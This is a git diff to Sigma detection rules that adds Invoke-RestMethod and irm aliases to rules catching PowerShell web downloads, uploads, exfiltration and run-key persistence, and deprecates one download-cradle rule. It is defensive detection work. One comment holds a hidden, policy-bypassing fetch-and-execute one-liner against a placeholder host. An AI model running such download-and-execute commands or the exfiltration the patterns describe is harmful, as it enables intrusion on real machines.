diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml b/deprecated/windows/proc_creation_win_powershell_download_cradles.yml similarity index 95% rename from rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml rename to deprecated/windows/proc_creation_win_powershell_download_cradles.yml index 88d62daf8..cde62279c 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_download_cradles.yml +++ b/deprecated/windows/proc_creation_win_powershell_download_cradles.yml @@ -1,12 +1,12 @@ title: PowerShell Web Download id: 6e897651-f157-4d8f-aaeb-df8151488385 -status: test +status: deprecated description: Detects suspicious ways to download files or content using PowerShell references: - https://github.com/VirtualAlllocEx/Payload-Download-Cradles/blob/88e8eca34464a547c90d9140d70e9866dcbc6a12/Download-Cradles.cmd author: Florian Roth (Nextron Systems) date: 2022-03-24 -modified: 2023-01-05 +modified: 2025-07-18 tags: - attack.command-and-control - attack.execution diff --git a/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml b/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml index db994e6be..0a44b8cdb 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_script_with_upload_capabilities.yml @@ -8,7 +8,7 @@ references: - https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-webrequest?view=powershell-7.4 author: frack113 date: 2022-01-07 -modified: 2023-05-04 +modified: 2025-07-18 tags: - attack.exfiltration - attack.t1020 @@ -19,12 +19,18 @@ logsource: detection: selection_cmdlet: ScriptBlockText|contains: + - 'Invoke-RestMethod' - 'Invoke-WebRequest' + - 'irm ' - 'iwr ' selection_flag: ScriptBlockText|contains: - - '-Method Put' - - '-Method Post' + - '-Method "POST"' + - '-Method "PUT"' + - '-Method POST' + - '-Method PUT' + - "-Method 'POST'" + - "-Method 'PUT'" condition: all of selection_* falsepositives: - Unknown diff --git a/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml b/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml index 2bdf61bd4..a9d8f0b3f 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_susp_invoke_webrequest_useragent.yml @@ -8,7 +8,7 @@ references: - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1071.001/T1071.001.md#t1071001---web-protocols author: frack113 date: 2022-01-23 -modified: 2023-01-02 +modified: 2025-07-18 tags: - attack.command-and-control - attack.t1071.001 @@ -17,11 +17,15 @@ logsource: category: ps_script definition: 'Requirements: Script Block Logging must be enabled' detection: - selection: - ScriptBlockText|contains|all: + selection_webrequest: + ScriptBlockText|contains: - 'Invoke-WebRequest' - - '-UserAgent ' - condition: selection + - 'Invoke-RestMethod' + - ' irm ' # Space before and after to avoid false positives with 'irm' as a variable + - 'iwr ' + selection_useragent: + ScriptBlockText|contains: '-UserAgent ' + condition: all of selection_* falsepositives: - Unknown level: medium diff --git a/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml b/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml index c978e4067..fc9a9ea77 100644 --- a/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml +++ b/rules/windows/powershell/powershell_script/posh_ps_web_request_cmd_and_cmdlets.yml @@ -10,7 +10,7 @@ references: - https://blog.jourdant.me/post/3-ways-to-download-files-with-powershell author: James Pemberton / @4A616D6573 date: 2019-10-24 -modified: 2023-01-10 +modified: 2025-07-18 tags: - attack.execution - attack.t1059.001 @@ -25,6 +25,7 @@ detection: - 'curl ' - 'Invoke-RestMethod' - 'Invoke-WebRequest' + - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring - 'iwr ' - 'Net.WebClient' - 'Resume-BitsTransfer' diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml b/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml index 116097947..fd5043e3a 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_download_dll.yml @@ -1,11 +1,12 @@ title: Potential DLL File Download Via PowerShell Invoke-WebRequest id: 0f0450f3-8b47-441e-a31b-15a91dc243e2 status: test -description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest cmdlet +description: Detects potential DLL files being downloaded using the PowerShell Invoke-WebRequest or Invoke-RestMethod cmdlets. references: - https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution author: Florian Roth (Nextron Systems), Hieu Tran date: 2023-03-13 +modified: 2025-07-18 tags: - attack.command-and-control - attack.execution @@ -17,7 +18,9 @@ logsource: detection: selection: CommandLine|contains: + - 'Invoke-RestMethod ' - 'Invoke-WebRequest ' + - 'IRM ' - 'IWR ' CommandLine|contains|all: - 'http' diff --git a/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml b/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml index 5fb9dc6cf..119a8e737 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_download_iex.yml @@ -7,7 +7,7 @@ references: - https://labs.withsecure.com/publications/fin7-target-veeam-servers author: Florian Roth (Nextron Systems) date: 2022-03-24 -modified: 2023-05-04 +modified: 2025-07-18 tags: - attack.execution - attack.t1059 @@ -21,6 +21,8 @@ detection: - '.DownloadFile(' - 'Invoke-WebRequest ' - 'iwr ' + - 'Invoke-RestMethod ' + - 'irm ' #powershell -ep bypass -w h -c irm test.domain/ffe | iex selection_iex: CommandLine|contains: - ';iex $' diff --git a/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml b/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml index 55ffdff93..58df5081d 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml @@ -15,16 +15,20 @@ logsource: detection: selection_img: - Image|endswith: + - '\powershell_ise.exe' - '\powershell.exe' - '\pwsh.exe' - OriginalFileName: + - 'powershell_ise.EXE' - 'PowerShell.EXE' - 'pwsh.dll' selection_commands: CommandLine|contains: # These are all aliases of Invoke-WebRequest - 'curl ' + - 'Invoke-RestMethod' - 'Invoke-WebRequest' + - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring - 'iwr ' - 'wget ' selection_ip: diff --git a/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml b/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml index 892f6d19f..386afab76 100644 --- a/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml +++ b/rules/windows/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml @@ -9,7 +9,7 @@ references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022-08-02 -modified: 2024-02-23 +modified: 2025-07-18 tags: - attack.command-and-control - attack.t1105 @@ -19,9 +19,11 @@ logsource: detection: selection_img: - Image|endswith: + - '\powershell_ise.exe' - '\powershell.exe' - '\pwsh.exe' - OriginalFileName: + - 'powershell_ise.EXE' - 'PowerShell.EXE' - 'pwsh.dll' selection_commands: diff --git a/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml b/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml index e174a1b03..ab64735f0 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_data_exfiltration_via_cli.yml @@ -6,7 +6,7 @@ references: - https://www.sentinelone.com/blog/living-off-windows-defender-lockbit-ransomware-sideloads-cobalt-strike-through-microsoft-security-tool/ author: Nasreddine Bencherchali (Nextron Systems) date: 2022-08-02 -modified: 2023-07-27 +modified: 2025-07-18 tags: - attack.execution - attack.t1059.001 @@ -16,14 +16,17 @@ logsource: detection: selection_iwr: Image|endswith: + - '\powershell_ise.exe' - '\powershell.exe' - '\pwsh.exe' - '\cmd.exe' CommandLine|contains: + - 'curl ' + - 'Invoke-RestMethod' - 'Invoke-WebRequest' + - 'irm ' - 'iwr ' - 'wget ' - - 'curl ' CommandLine|contains|all: - ' -ur' # Shortest possible version of the -uri flag - ' -me' # Shortest possible version of the -method flag diff --git a/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml b/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml index 89b66f3ce..b2c055e31 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml @@ -8,7 +8,7 @@ references: - https://twitter.com/fr0s7_/status/1712780207105404948 author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems) date: 2022-08-03 -modified: 2023-11-06 +modified: 2025-07-18 tags: - attack.discovery logsource: @@ -19,6 +19,8 @@ detection: CommandLine|contains: - 'Invoke-WebRequest' - 'iwr ' + - 'Invoke-RestMethod' + - 'irm ' - 'wget ' - 'curl ' - 'DownloadFile' diff --git a/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml b/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml index 580a7accb..283020fdd 100644 --- a/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml +++ b/rules/windows/process_creation/proc_creation_win_susp_web_request_cmd_and_cmdlets.yml @@ -7,6 +7,8 @@ related: type: obsolete - id: cd5c8085-4070-4e22-908d-a5b3342deb74 type: obsolete + - id: 6e897651-f157-4d8f-aaeb-df8151488385 + type: obsolete status: test description: Detects the use of various web request commands with commandline tools and Windows PowerShell cmdlets (including aliases) via CommandLine references: @@ -15,7 +17,7 @@ references: - https://learn.microsoft.com/en-us/powershell/module/bitstransfer/add-bitsfile?view=windowsserver2019-ps author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger date: 2019-10-24 -modified: 2023-01-10 +modified: 2025-07-18 tags: - attack.execution - attack.t1059.001 @@ -29,6 +31,7 @@ detection: - 'curl ' - 'Invoke-RestMethod' - 'Invoke-WebRequest' + - ' irm ' # Space before and after to avoid false positives with 'irm' as a substring - 'iwr ' - 'Net.WebClient' - 'Resume-BitsTransfer' diff --git a/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml b/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml index 05ee02fd2..7b7684472 100644 --- a/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml +++ b/rules/windows/registry/registry_set/registry_set_powershell_in_run_keys.yml @@ -1,4 +1,4 @@ -title: Suspicious Powershell In Registry Run Keys +title: Suspicious PowerShell In Registry Run Keys id: 8d85cf08-bf97-4260-ba49-986a2a65129c status: test description: Detects potential PowerShell commands or code within registry run keys @@ -8,7 +8,7 @@ references: - https://github.com/HackTricks-wiki/hacktricks/blob/e4c7b21b8f36c97c35b7c622732b38a189ce18f7/src/windows-hardening/windows-local-privilege-escalation/privilege-escalation-with-autorun-binaries.md author: frack113, Florian Roth (Nextron Systems) date: 2022-03-17 -modified: 2025-02-17 +modified: 2025-07-18 tags: - attack.persistence - attack.t1547.001 @@ -40,6 +40,8 @@ detection: - 'ICM -' - 'Invoke-WebRequest' - 'IWR ' + - 'Invoke-RestMethod' + - 'IRM ' - ' -noni ' - ' -noninteractive ' condition: selection